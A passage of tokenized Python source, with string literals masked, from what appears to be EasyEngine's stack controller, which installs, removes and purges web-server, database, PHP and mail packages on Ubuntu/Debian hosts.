app . pargs . php ) and ( not self . app . pargs . mysql ) and <EOL> ( not self . app . pargs . postfix ) and ( not self . app . pargs . wpcli ) and <EOL> ( not self . app . pargs . phpmyadmin ) and ( not self . app . pargs . hhvm ) <EOL> and ( not self . app . pargs . pagespeed ) and <EOL> ( not self . app . pargs . adminer ) and ( not self . app . pargs . utils ) and <EOL> ( not self . app . pargs . mailscanner ) and ( not self . app . pargs . all ) <EOL> and ( not self . app . pargs . redis ) and ( not self . app . pargs . nginxmainline ) and <EOL> ( not self . app . pargs . phpredisadmin ) and ( not self . app . pargs . php7 ) ) : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> if self . app . pargs . all : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> self . app . pargs . mail = True <EOL> if self . app . pargs . web : <EOL> self . app . pargs . nginx = True <EOL> self . app . pargs . php = True <EOL> self . app . pargs . mysql = True <EOL> self . app . pargs . wpcli = True <EOL> self . app . pargs . postfix = True <EOL> if self . app . pargs . admin : <EOL> self . app . pargs . nginx = True <EOL> self . app . pargs . php = True <EOL> self . app . pargs . mysql = True <EOL> self . app . pargs . adminer = True <EOL> self . app . pargs . phpmyadmin = True <EOL> self . app . pargs . utils = True <EOL> if self . app . pargs . mail : <EOL> self . app . pargs . nginx = True <EOL> self . app . pargs . php = True <EOL> self . app . pargs . mysql = True <EOL> self . app . pargs . postfix = True <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> check_fqdn ( self , <EOL> os . popen ( "<STR_LIT>" ) . read ( ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_mail <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . 
ee_vimbadmin ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_roundcube ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ] <EOL> if EEVariables . ee_ram > <NUM_LIT> : <EOL> self . app . pargs . mailscanner = True <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . pagespeed : <EOL> if not ( EEAptGet . is_installed ( self , '<STR_LIT>' ) or EEAptGet . is_installed ( self , '<STR_LIT>' ) ) : <EOL> self . app . pargs . nginx = True <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . redis : <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_redis <EOL> self . app . pargs . php = True <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . nginx : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not ( EEAptGet . is_installed ( self , '<STR_LIT>' ) or EEAptGet . is_installed ( self , '<STR_LIT>' ) ) : <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_nginx <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> apt = [ "<STR_LIT>" ] + EEVariables . ee_nginx <EOL> self . post_pref ( apt , packages ) <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . warn ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_prompt = input ( "<STR_LIT>" ) <EOL> if ee_prompt == '<STR_LIT>' or ee_prompt == '<STR_LIT:yes>' : <EOL> EEService . stop_service ( self , '<STR_LIT>' ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . remove ( self , EEVariables . ee_nginx_dev ) <EOL> EEAptGet . auto_remove ( self ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EERepo . 
remove ( self , repo_url = EEVariables . ee_nginx_dev_repo ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if EEAptGet . download_only ( self , EEVariables . ee_nginx , EEVariables . ee_nginx_repo , EEVariables . ee_nginx_key ) : <EOL> apt_packages = apt_packages + EEVariables . ee_nginx <EOL> else : <EOL> EERepo . add ( self , repo_url = EEVariables . ee_nginx_dev_repo ) <EOL> Log . error ( self , "<STR_LIT>" , False ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx_dev <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . nginxmainline : <EOL> if EEVariables . ee_nginx_dev_repo == None : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not ( EEAptGet . is_installed ( self , '<STR_LIT>' ) or EEAptGet . is_installed ( self , '<STR_LIT>' ) ) : <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_nginx_dev <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> apt = [ "<STR_LIT>" ] + EEVariables . ee_nginx <EOL> self . post_pref ( apt , packages ) <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . warn ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_prompt = input ( "<STR_LIT>" ) <EOL> if ee_prompt == '<STR_LIT>' or ee_prompt == '<STR_LIT:yes>' : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if EEAptGet . download_only ( self , EEVariables . ee_nginx_dev , EEVariables . ee_nginx_dev_repo , EEVariables . ee_nginx_key ) : <EOL> EEService . stop_service ( self , '<STR_LIT>' ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . remove ( self , EEVariables . ee_nginx ) <EOL> EEAptGet . auto_remove ( self ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx_dev <EOL> else : <EOL> Log . 
error ( self , "<STR_LIT>" , False ) <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not ( EEAptGet . is_installed ( self , '<STR_LIT>' ) or EEAptGet . is_installed ( self , '<STR_LIT>' ) ) : <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> apt_packages = apt_packages + EEVariables . ee_php5_6 + EEVariables . ee_php_extra <EOL> else : <EOL> apt_packages = apt_packages + EEVariables . ee_php <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php7 : <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php7_0 + EEVariables . ee_php_extra <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php5_6 + EEVariables . ee_php_extra <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . hhvm : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if platform . architecture ( ) [ <NUM_LIT:0> ] is '<STR_LIT>' : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_hhvm <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . mysql : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> apt_packages = apt_packages + EEVariables . ee_mysql <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ] <EOL> else : <EOL> Log . 
debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . postfix : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_postfix <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . wpcli : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_wp_cli ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ] <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . phpmyadmin : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> if self . app . pargs . phpredisadmin : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> if self . app . pargs . adminer : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_adminer ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" ] ] <EOL> if self . app . pargs . mailscanner : <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> if ( EEAptGet . is_installed ( self , '<STR_LIT>' ) or <EOL> self . app . pargs . mail ) : <EOL> apt_packages = ( apt_packages + <EOL> EEVariables . ee_mailscanner ) <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . utils : <EOL> Log . 
debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> ] <EOL> except Exception as e : <EOL> pass <EOL> if len ( apt_packages ) or len ( packages ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> self . pre_pref ( apt_packages ) <EOL> if len ( apt_packages ) : <EOL> EESwap . add ( self ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . update ( self ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . install ( self , apt_packages ) <EOL> if len ( packages ) : <EOL> Log . debug ( self , "<STR_LIT>" . format ( packages ) ) <EOL> EEDownload . download ( self , packages ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> self . post_pref ( apt_packages , packages ) <EOL> if '<STR_LIT>' in apt_packages : <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if EEVariables . ee_ram < <NUM_LIT> : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> . format ( int ( EEVariables . ee_ram * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:0.1> ) ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> . 
format ( int ( EEVariables . ee_ram * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:0.1> ) ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> . format ( int ( EEVariables . ee_ram * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> . format ( int ( EEVariables . ee_ram * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if disp_msg : <EOL> if len ( self . msg ) : <EOL> for msg in self . msg : <EOL> Log . info ( self , Log . ENDC + msg ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> else : <EOL> return self . msg <EOL> @ expose ( help = "<STR_LIT>" ) <EOL> def remove ( self ) : <EOL> """<STR_LIT>""" <EOL> apt_packages = [ ] <EOL> packages = [ ] <EOL> if ( ( not self . app . pargs . web ) and ( not self . app . pargs . admin ) and <EOL> ( not self . app . pargs . mail ) and ( not self . app . pargs . nginx ) and <EOL> ( not self . app . pargs . php ) and ( not self . app . pargs . php7 ) and ( not self . app . pargs . mysql ) and <EOL> ( not self . app . pargs . postfix ) and ( not self . app . pargs . wpcli ) and <EOL> ( not self . app . pargs . phpmyadmin ) and ( not self . app . pargs . hhvm ) and <EOL> ( not self . app . pargs . adminer ) and ( not self . app . pargs . utils ) and <EOL> ( not self . app . pargs . mailscanner ) and ( not self . app . pargs . all ) and <EOL> ( not self . app . pargs . pagespeed ) and ( not self . app . pargs . redis ) and <EOL> ( not self . app . pargs . phpredisadmin ) and ( not self . app . pargs . nginxmainline ) ) : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> if self . app . pargs . all : <EOL> self . app . pargs . 
web = True <EOL> self . app . pargs . admin = True <EOL> self . app . pargs . mail = True <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> self . app . pargs . php7 = True <EOL> if self . app . pargs . web : <EOL> self . app . pargs . nginx = True <EOL> self . app . pargs . php = True <EOL> self . app . pargs . mysql = True <EOL> self . app . pargs . wpcli = True <EOL> self . app . pargs . postfix = True <EOL> if self . app . pargs . admin : <EOL> self . app . pargs . adminer = True <EOL> self . app . pargs . phpmyadmin = True <EOL> self . app . pargs . utils = True <EOL> if self . app . pargs . mail : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_mail <EOL> apt_packages = apt_packages + EEVariables . ee_mailscanner <EOL> packages = packages + [ "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> EEMysql . execute ( self , "<STR_LIT>" ) <EOL> EEMysql . execute ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . mailscanner : <EOL> apt_packages = ( apt_packages + EEVariables . ee_mailscanner ) <EOL> if self . app . pargs . pagespeed : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> if self . app . pargs . nginx : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . nginxmainline : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx_dev <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if EEVariables . 
ee_platform_codename == '<STR_LIT>' : <EOL> apt_packages = apt_packages + EEVariables . ee_php5_6 <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php_extra <EOL> else : <EOL> apt_packages = apt_packages + EEVariables . ee_php <EOL> if self . app . pargs . php7 : <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_php7_0 <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php_extra <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . hhvm : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_hhvm <EOL> if self . app . pargs . redis : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_redis <EOL> if self . app . pargs . mysql : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_mysql <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> if self . app . pargs . postfix : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_postfix <EOL> if self . app . pargs . wpcli : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> else : <EOL> Log . warn ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . phpmyadmin : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if self . app . pargs . phpredisadmin : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if self . app . pargs . adminer : <EOL> Log . 
debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if self . app . pargs . utils : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if len ( packages ) or len ( apt_packages ) : <EOL> ee_prompt = input ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if ee_prompt == '<STR_LIT>' or ee_prompt == '<STR_LIT:yes>' : <EOL> if ( set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) or <EOL> set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) ) : <EOL> EEService . stop_service ( self , '<STR_LIT>' ) <EOL> if len ( packages ) : <EOL> EEFileUtils . remove ( self , packages ) <EOL> EEAptGet . auto_remove ( self ) <EOL> if len ( apt_packages ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . remove ( self , apt_packages ) <EOL> EEAptGet . auto_remove ( self ) <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EERepo . remove ( self , repo_url = EEVariables . ee_nginx_dev_repo ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php7 : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> @ expose ( help = "<STR_LIT>" ) <EOL> def purge ( self ) : <EOL> """<STR_LIT>""" <EOL> apt_packages = [ ] <EOL> packages = [ ] <EOL> if ( ( not self . app . pargs . web ) and ( not self . 
app . pargs . admin ) and <EOL> ( not self . app . pargs . mail ) and ( not self . app . pargs . nginx ) and <EOL> ( not self . app . pargs . php ) and ( not self . app . pargs . php7 ) and ( not self . app . pargs . mysql ) and <EOL> ( not self . app . pargs . postfix ) and ( not self . app . pargs . wpcli ) and <EOL> ( not self . app . pargs . phpmyadmin ) and ( not self . app . pargs . hhvm ) and <EOL> ( not self . app . pargs . adminer ) and ( not self . app . pargs . utils ) and <EOL> ( not self . app . pargs . mailscanner ) and ( not self . app . pargs . all ) and <EOL> ( not self . app . pargs . pagespeed ) and ( not self . app . pargs . redis ) and <EOL> ( not self . app . pargs . phpredisadmin ) and ( not self . app . pargs . nginxmainline ) ) : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> if self . app . pargs . all : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> self . app . pargs . mail = True <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> self . app . pargs . php7 = True <EOL> if self . app . pargs . web : <EOL> self . app . pargs . nginx = True <EOL> self . app . pargs . php = True <EOL> self . app . pargs . mysql = True <EOL> self . app . pargs . wpcli = True <EOL> self . app . pargs . postfix = True <EOL> if self . app . pargs . admin : <EOL> self . app . pargs . adminer = True <EOL> self . app . pargs . phpmyadmin = True <EOL> self . app . pargs . utils = True <EOL> if self . app . pargs . mail : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_mail <EOL> apt_packages = apt_packages + EEVariables . ee_mailscanner <EOL> packages = packages + [ "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> EEMysql . execute ( self , "<STR_LIT>" ) <EOL> EEMysql . 
execute ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . mailscanner : <EOL> apt_packages = ( apt_packages + EEVariables . ee_mailscanner ) <EOL> if self . app . pargs . pagespeed : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> if self . app . pargs . nginx : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . nginxmainline : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx_dev <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> apt_packages = apt_packages + EEVariables . ee_php5_6 <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php_extra <EOL> else : <EOL> apt_packages = apt_packages + EEVariables . ee_php <EOL> if self . app . pargs . php7 : <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_php7_0 <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php_extra <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . hhvm : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_hhvm <EOL> if self . app . pargs . redis : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_redis <EOL> if self . app . pargs . mysql : <EOL> Log . 
debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_mysql <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> if self . app . pargs . postfix : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_postfix <EOL> if self . app . pargs . wpcli : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> packages = packages + [ '<STR_LIT>' ] <EOL> else : <EOL> Log . warn ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . phpmyadmin : <EOL> packages = packages + [ '<STR_LIT>' . <EOL> format ( EEVariables . ee_webroot ) ] <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . phpredisadmin : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if self . app . pargs . adminer : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> if self . app . pargs . utils : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) <EOL> ] <EOL> if len ( packages ) or len ( apt_packages ) : <EOL> ee_prompt = input ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if ee_prompt == '<STR_LIT>' or ee_prompt == '<STR_LIT:yes>' : <EOL> if ( set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) or <EOL> set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) ) : <EOL> EEService . stop_service ( self , '<STR_LIT>' ) <EOL> if len ( apt_packages ) : <EOL> Log . 
info ( self , "<STR_LIT>" ) <EOL> EEAptGet . remove ( self , apt_packages , purge = True ) <EOL> EEAptGet . auto_remove ( self ) <EOL> if len ( packages ) : <EOL> EEFileUtils . remove ( self , packages ) <EOL> EEAptGet . auto_remove ( self ) <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EERepo . remove ( self , repo_url = EEVariables . ee_nginx_dev_repo ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php7 : <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> def load ( app ) : <EOL> handler . register ( EEStackController ) <EOL> handler . register ( EEStackStatusController ) <EOL> handler . register ( EEStackMigrateController ) <EOL> handler . register ( EEStackUpgradeController ) <EOL> hook . register ( '<STR_LIT>' , ee_stack_hook ) </s>
<s> VERSION = '<STR_LIT>' </s>
